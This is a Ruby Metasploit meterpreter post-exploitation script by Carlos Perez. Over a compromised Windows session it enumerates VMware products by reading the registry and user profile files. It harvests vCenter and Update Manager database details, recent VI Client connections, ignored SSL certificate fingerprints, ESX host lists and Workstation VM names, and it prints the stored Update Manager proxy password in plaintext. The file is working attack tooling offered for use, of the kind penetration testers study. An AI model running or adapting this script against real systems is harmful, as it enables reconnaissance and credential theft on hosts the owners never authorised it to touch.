##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
#-------------------------------------------------------------------------------
################## Variable Declarations ##################
# Keep the session handle in an instance variable so the helper methods
# defined further down can reach it.
@client = client

# The script recognises a single switch: -h prints the usage text and stops.
opts = Rex::Parser::Arguments.new("-h" => [false, "Help menu."])

opts.parse(args) do |opt, _idx, _val|
  next unless opt == "-h"

  print_line("vmware_enum -- Enumerates VMware Configurations for VMware Products")
  print_line("USAGE: run vmware_enum")
  print_line(opts.usage)
  # Ends the script right after the help text has been shown.
  raise Rex::Script::Completed
end
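# Prints and returns the subkey names found under
# HKLM\SOFTWARE\VMware, Inc. (one subkey per installed product).
#
# Returns whatever the registry key's enum_key yields (an array of names).
def check_prods()
  key = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\VMware, Inc.', KEY_READ)
  begin
    sfmsvals = key.enum_key
  ensure
    # Release the registry handle even when enumeration fails. check_vmsoft
    # closes its key as well; this method previously leaked the handle.
    key.close
  end
  print_status("The Following Products are installed on this host:")
  sfmsvals.each { |p| print_status("\t#{p}") }
  sfmsvals
end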
# Reports whether HKLM\SOFTWARE has a "VMware, Inc." subkey.
#
# Prints a status line when the vendor key exists and an error line when it
# does not, closes the registry key, and returns true or false accordingly.
def check_vmsoft
  software_key = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE', KEY_READ)
  vendor_present = software_key.enum_key.include?("VMware, Inc.")

  if vendor_present
    print_status("VMware Products are Installed in Host")
  else
    print_error("No VMware Products where found in this Host.")
  end

  software_key.close
  vendor_present
end
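# Prints version, serial, group type, Tomcat version and database settings
# for VMware VirtualCenter, all read with registry_getvaldata from HKLM.
#
# The ODBC data-source name stored under ...\VMware VirtualCenter\DB (value
# "1") selects the HKLM\SOFTWARE\ODBC\ODBC.INI\<name> key from which the
# database name and server are read.
def enum_vcenter
  print_status("Information about Virtual Center:")
  vc_key = "HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter"
  vc_version = registry_getvaldata(vc_key, "InstalledVersion")
  vc_serial = registry_getvaldata(vc_key, "Serial")
  vc_dbinstance = registry_getvaldata(vc_key, "DBInstanceName")
  vc_dbtype = registry_getvaldata(vc_key, "DBServerType")
  vc_tomcatver = registry_getvaldata("#{vc_key}\\Tomcat", "Version")
  vc_type = registry_getvaldata(vc_key, "GroupType")
  vc_odbcname = registry_getvaldata("#{vc_key}\\DB", "1")
  vc_odbctype = registry_getvaldata("#{vc_key}\\DB", "4")

  # The original also carried a commented-out lookup of the ODBC user name and
  # stored password (DB values "2" and "3"); it was disabled and stays out.

  # A missing data-source name used to raise NoMethodError on nil.chomp and
  # abort the whole script; skip the ODBC lookup instead.
  vc_dbname = nil
  vc_dbserver = nil
  dsn = vc_odbcname.to_s.chomp
  unless dsn.empty?
    odbc_key = "HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{dsn}"
    vc_dbname = registry_getvaldata(odbc_key, "Database")
    vc_dbserver = registry_getvaldata(odbc_key, "Server")
  end

  print_status("\tVersion: #{vc_version}")
  print_status("\tSerial: #{vc_serial}")
  print_status("\tvCenter Type: #{vc_type}")
  print_status("\tTomcat Version: #{vc_tomcatver}")
  print_status("\tDatabase Instance: #{vc_dbinstance}")
  print_status("\tDatabase Type: #{vc_dbtype}")
  print_status("\tDatabase Name: #{vc_dbname}")
  print_status("\tDatabase Server: #{vc_dbserver}")
  print_status("\tODBC Name: #{vc_odbcname}")
  print_status("\tODBC Type: #{vc_odbctype}")
end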
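# Prints VI Client details: installed version, registered plugins, and for
# each user the "RecentConnections" list plus the entries stored under
# ...\Preferences\UI\SSLIgnore (printed as host / "SSL Fingerprint" pairs).
#
# When is_system? is false only HKCU is read. Otherwise every HKU subkey whose
# name matches the S-1-5-21-... pattern is read in turn.
def enum_viclient
  print_status("Information about VMware VI Client:")
  vi_version = nil
  vi_pluggins = nil
  begin
    vi_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Virtual Infrastructure Client\\4.0", "InstalledVersion")
    vi_pluggins = registry_enumvals("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Virtual Infrastructure Client\\Plugins")
  rescue StandardError
    # Best effort, as in the original: a failed read leaves the fields blank.
  end
  print_status("\tVersion: #{vi_version}")

  (vi_pluggins || []).each do |pi|
    case pi
    when /Converter/ then print_status("\tPlugin: VMware Converter")
    when /UM/        then print_status("\tPlugin: VMware Update Manager")
    else                  print_status("\tPlugin: #{pi}")
    end
  end

  if is_system?
    hku_root, hku_base = @client.sys.registry.splitkey("HKU\\")
    hku = @client.sys.registry.open_key(hku_root, hku_base)
    begin
      user_sid = hku.enum_key.select { |k| k =~ /S-1-5-21-\d*-\d*-\d*-\d{3,6}$/ }
    ensure
      # The handle on HKU was never released before.
      hku.close
    end

    user_sid.each do |us|
      begin
        enumed_user = registry_getvaldata("HKU\\#{us}\\Volatile Environment", "USERNAME")
        print_status("\tRecent VI Client Connections for #{enumed_user}:")
        recent = registry_getvaldata("HKU\\#{us}\\Software\\VMware\\VMware Infrastructure Client\\Preferences", "RecentConnections")
        if recent.nil?
          # Previously reached by letting nil.split raise into the rescue below.
          print_status("\tUser appears to have not used the software.")
          next
        end
        recent.split(",").each { |c| print_status("\t#{c}") }

        # Was "HCU\\..." for the value read, which is not a registry hive; the
        # failed lookup fell into the rescue and was misreported as
        # "not used the software".
        ssl_path = "HKU\\#{us}\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore"
        ignore_ssl = registry_enumkeys(ssl_path) || []
        unless ignore_ssl.empty?
          print_status("\tIgnored SSL Certs for #{enumed_user}:")
          ignore_ssl.each do |issl|
            ssl_key = registry_getvaldata(ssl_path, issl)
            print_status("\tHost: #{issl} SSL Fingerprint: #{ssl_key}")
          end
        end
      rescue StandardError
        print_status("\tUser appears to have not used the software.")
      end
    end
  else
    # Missing preferences used to raise on nil.split / nil.length with no
    # rescue around them, aborting the script; treat them as empty.
    recentconns = registry_getvaldata("HKCU\\Software\\VMware\\VMware Infrastructure Client\\Preferences", "RecentConnections").to_s.split(",")
    print_status("Recent VI Client Connections:")
    recentconns.each { |c| print_status("\t#{c}") }

    ssl_path = "HKCU\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore"
    ignore_ssl = registry_enumkeys(ssl_path) || []
    unless ignore_ssl.empty?
      print_status("\tIgnored SSL Certs for")
      ignore_ssl.each do |issl|
        ssl_key = registry_getvaldata(ssl_path, issl)
        print_status("\tHost: #{issl} SSL Fingerprint: #{ssl_key}")
      end
    end
  end
end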
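# Prints the VMware Update Manager settings stored under
# HKLM\SOFTWARE\VMware, Inc.\VMware Update Manager: version, server, patch
# store, proxy settings, the vCenter it is bound to, and its ODBC data source.
#
# NOTE(review): the "ProxyPassword" value is echoed verbatim, so it ends up in
# whatever console or spool log captures this output; handle that output as
# credential material.
def enum_vum
  print_status("Information about VMware Update Manager:")
  begin
    vum_key = "HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager"
    vum_version = registry_getvaldata(vum_key, "InstalledVersion")
    vum_server = registry_getvaldata(vum_key, "VUMServer")
    vum_dbtype = registry_getvaldata(vum_key, "DBServerType")
    # "DirectWebAccess" was read into a local that nothing used; dropped.
    vum_useproxy = registry_getvaldata(vum_key, "UseProxy")
    vum_proxyserver = registry_getvaldata(vum_key, "ProxyServer")
    vum_proxyport = registry_getvaldata(vum_key, "ProxyPort")
    vum_proxyuser = registry_getvaldata(vum_key, "ProxyUserName")
    vum_proxypass = registry_getvaldata(vum_key, "ProxyPassword")
    vum_vcentersrv = registry_getvaldata(vum_key, "VCServer")
    vum_vcenterusr = registry_getvaldata(vum_key, "VCUserName")
    vum_patchstore = registry_getvaldata(vum_key, "PatchStore")
    vum_odbcname = registry_getvaldata("#{vum_key}\\DB", "1")
    vum_odbctype = registry_getvaldata("#{vum_key}\\DB", "4")

    # A missing data-source name used to raise on nil.chomp, and the rescue
    # below then replaced the whole report with a single error line.
    vum_dbname = nil
    vum_dbserver = nil
    dsn = vum_odbcname.to_s.chomp
    unless dsn.empty?
      odbc_key = "HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{dsn}"
      vum_dbname = registry_getvaldata(odbc_key, "Database")
      vum_dbserver = registry_getvaldata(odbc_key, "Server")
    end

    # The original also carried a commented-out lookup of the ODBC user name
    # and stored password (DB values "2" and "3"); it stays disabled.

    print_status("\tVersion: #{vum_version}")
    print_status("\tServer: #{vum_server}")
    print_status("\tPatch Store: #{vum_patchstore}")
    print_status("\tDatabse Type: #{vum_dbtype}")
    print_status("\tUses Proxy: #{vum_useproxy}")
    print_status("\tProxy User: #{vum_proxyuser}")
    print_status("\tProxy Password: #{vum_proxypass}")
    print_status("\tVirtual Center: #{vum_vcentersrv}")
    print_status("\tVirtual Center User: #{vum_vcenterusr}")
    print_status("\tProxy Server: #{vum_proxyserver}:#{vum_proxyport}")
    print_status("\tDatabase Name: #{vum_dbname}")
    print_status("\tDatabase Server: #{vum_dbserver}")
    print_status("\tODBC Name: #{vum_odbcname}")
    print_status("\tODBC Type: #{vum_odbctype}")
  rescue ::Exception => e
    # NOTE(review): rescuing ::Exception also traps Interrupt and SystemExit.
    # Narrow this to StandardError once it is confirmed that no error raised
    # by the registry helpers lives outside that hierarchy.
    print_status("Error: #{e.class} #{e}")
  end
end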
# Prints the "ProductVersion" value stored under
# HKLM\SOFTWARE\VMware, Inc.\VMware VDM.
def enum_vdm
  print_status("Information about VMware VDM Broker:")
  broker_key = "HKLM\\SOFTWARE\\VMware, Inc.\\VMware VDM"
  product_version = registry_getvaldata(broker_key, "ProductVersion")
  print_status("\tVersion: #{product_version}")
end
# Prints the PowerCLI version and install path, followed by the Windows
# PowerShell "ExecutionPolicy" value. If reading the policy raises, the
# string "Restricted" is printed in its place.
def enum_powercli
  print_status("Information about PowerCLI:")
  powercli_key = "HKLM\\SOFTWARE\\VMware, Inc.\\VMware vSphere PowerCLI"
  version = registry_getvaldata(powercli_key, "InstalledVersion")
  install_dir = registry_getvaldata(powercli_key, "InstallPath")

  exec_policy =
    begin
      registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\WindowsPowerShell", "ExecutionPolicy")
    rescue
      "Restricted"
    end

  print_status("\tVersion: #{version}")
  print_status("\tInstalled Pat: #{install_dir}")
  print_status("\tPowershell Execution Policy: #{exec_policy}")
end
#Function to enumerate the users if running as SYSTEM
# Builds a list of { 'username', 'userappdata' } hashes, where 'userappdata'
# is the per-user VMware application-data directory.
#
# The profile layout is picked by matching the session's OS string against
# /7|Vista|2008/; any other OS string falls back to the
# "Documents and Settings" layout. When the session UID is
# "NT AUTHORITY\SYSTEM" every directory under the profiles root is listed
# (well-known non-user entries are skipped); otherwise only the account named
# by the USERNAME environment variable is returned.
def enum_users
  cfg = @client.sys.config
  os_name = cfg.sysinfo['OS']
  current_uid = cfg.getuid
  system_drive = cfg.getenv('SystemDrive')

  profiles_root, vmware_subdir =
    if os_name =~ /7|Vista|2008/
      [system_drive + "\\users\\", "\\AppData\\Local\\VMware\\"]
    else
      [system_drive + "\\Documents and Settings\\", "\\Application Data\\VMware\\"]
    end

  unless current_uid == "NT AUTHORITY\\SYSTEM"
    account = cfg.getenv('USERNAME')
    return [{ 'username' => account, 'userappdata' => profiles_root + account + vmware_subdir }]
  end

  print_status("Running as SYSTEM extracting user list..")
  found = []
  @client.fs.dir.foreach(profiles_root) do |entry|
    next if entry =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/

    found << { 'username' => entry, 'userappdata' => profiles_root + entry + vmware_subdir }
  end
  found
end
# For every profile returned by enum_users, prints the entries found in
# <userappdata>VIU\hosts\ (the "." and ".." entries are skipped).
#
# A profile whose directory cannot be listed is skipped silently: any
# StandardError raised while listing it is swallowed.
def enum_vihosupdt
  print_status("Information about VMware vSphere Host Update Utility:")
  enum_users.each do |profile|
    print_status("\tESX/ESXi Hosts added for Updates for user #{profile['username']}:")
    begin
      hosts_dir = profile['userappdata'] + "VIU\\hosts\\"
      @client.fs.dir.foreach(hosts_dir) do |entry|
        print_status("\t#{entry}") unless entry =~ /^(\.|\.\.)$/
      end
    rescue
      # Best effort: no listing for this profile.
    end
  end
end
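# Reads each user's favorites.vmls (path derived from 'userappdata' with
# "Local" replaced by "Roaming") and prints the configuration-file and
# display-name entries found in it.
#
# All files are read first and their contents concatenated; the entries are
# printed afterwards, so they appear below the per-user header lines rather
# than grouped under each user.
def enum_vmwarewrk
  print_status("Enumerating VMware Workstation VM's:")
  fav_file = ""
  enum_users.each do |u|
    print_status("\tVM's for user #{u['username']}:")
    path = u['userappdata'].gsub(/Local/, "Roaming")
    account_file = @client.fs.file.new(path + "\\favorites.vmls", "rb")
    begin
      fav_file << account_file.read until account_file.eof?
    ensure
      # The file handle was never closed before; release it even if a read
      # fails part-way through.
      account_file.close
    end
  end
  fav_file.each_line do |l|
    if l =~ /config/
      print_status("\tConfiguration File: #{l.scan(/vmlist\d*.config \= (\".*\")/)}")
    end
    if l =~ /Name/
      print_status("\tVM Name: #{l.scan(/vmlist\d*.DisplayName \= (\".*\")/)}")
      print_status("")
    end
  end
end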
# Entry point: only Windows sessions are handled. Each enumeration routine
# runs only when the matching product name is among the subkeys reported by
# check_prods.
unless client.platform =~ /win32|win64/
  print_error("This version of Meterpreter is not supported with this Script!")
  raise Rex::Script::Completed
end

if check_vmsoft
  vmware_products = check_prods()
  enum_vcenter   if vmware_products.include?("VMware VirtualCenter")
  enum_viclient  if vmware_products.include?("VMware Virtual Infrastructure Client")
  enum_vum       if vmware_products.include?("VMware Update Manager")
  enum_vdm       if vmware_products.include?("VMware VDM")
  enum_powercli  if vmware_products.include?("VMware vSphere PowerCLI")
  enum_vihosupdt if vmware_products.include?("VMware vSphere Host Update Utility 4.0")
  enum_vmwarewrk if vmware_products.include?("VMware Workstation")
else
  print_status("No VMware Products appear to be installed in this host")
end